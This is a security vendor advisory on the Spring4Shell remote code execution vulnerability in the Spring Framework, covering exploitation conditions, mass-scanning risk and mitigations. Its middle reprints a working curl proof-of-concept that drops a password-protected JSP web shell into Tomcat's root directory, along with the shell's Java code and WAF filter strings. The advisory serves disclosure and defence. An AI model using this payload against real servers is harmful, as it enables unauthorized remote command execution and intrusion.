🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Category: Vulnerability Intelligence | Vulnerability Class: Remote code execution | CVE ID: To be assigned | CVSS:3.0 Score: To be assigned |
About Spring FrameworkThe Spring Framework is an open-source application framework that provides infrastructure support for developing Java applications. Spring is the world's most popular lightweight open-source Java framework, that facilitates the Java enterprise application development cycle for developers. Java, Spring Boot, Auth0, Bugsnag, and Java EE are some of the popular tools that integrate with Spring. 544 companies reportedly use Spring in their tech stacks, including Accenture and Zalando. | ExploitationTo successfully exploit the vulnerability, the DataBinder must be enabled. In some cases, all an attacker needs to do is submit a specially crafted HTTP request to a vulnerable system to exploit the vulnerability. Conversely, the exploitation of certain other configurations requires extra research to develop an effective payload. On Successful ExploitationThreat actors can leverage these exploits to run commands on the server, granting them initial access to the device. |
Mass ScanningThreat actors will be able to devise scripts that crawl the Internet and automatically exploit susceptible servers because the exploitation involves only a simple HTTP POST to a vulnerable app. | |
Note: The Java Spring Core Zero-Day Vulnerability also dubbed “Spring4Shell” is unrelated from the other vulnerabilities disclosed in the Spring framework this week, including the DoS vulnerability (CVE-2022-22950) and the Spring Cloud expression resource access vulnerability (CVE-2022-22963). |
The various posts related to the exploit released for Spring4Shell are listed as follows:
Proof of Concept (Exploit)
curl -v -d "class.module.classLoader.resources.context.parent.pipeline .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(% 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int% 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20 while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7 D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl ass.module.classLoader.resources.context.parent.pipeline.first.fileDat eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1- SNAPSHOT/rapid7
This payload drops a password protected web shell in the Tomcat Root Directory called tomcatwar.jsp
- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = -.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out. println(new String(b)); } } -
This Tomcat server specific payload alters the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file + payload.
Users running JDK version 9 and newer are vulnerable to an RCE attack. Also, all versions of Spring Core are said to be impacted.
At present, there is no official patch from Spring. Hence Threat actors can leverage this vulnerability to perform unauthorized remote code execution. Due to the ease of exploitation, the threat actors may undertake large-scale exploitation activities similar to Log4j. Attackers can exploit the vulnerability to perform malware or ransomware attacks on an organization
In Spring Framework, DataBinder has the functionality to disallow certain patterns. As temporary mitigation for this vulnerability, the ControllerAdvice
component can be created (which is a Spring component shared across Controllers) and dangerous patterns can be added to the denylist.
On network protection devices such as WAF, implement rule filtering for strings such as "class.*", "Class.*", "*.class.*", and "*.Class.*" according to the actual traffic situation of deployed services. This is because, "Spring4Shell" leverages class injection (very severe)
Lastly, one should stay updated on the latest release of official patches from Spring and fix vulnerabilities according to these patches.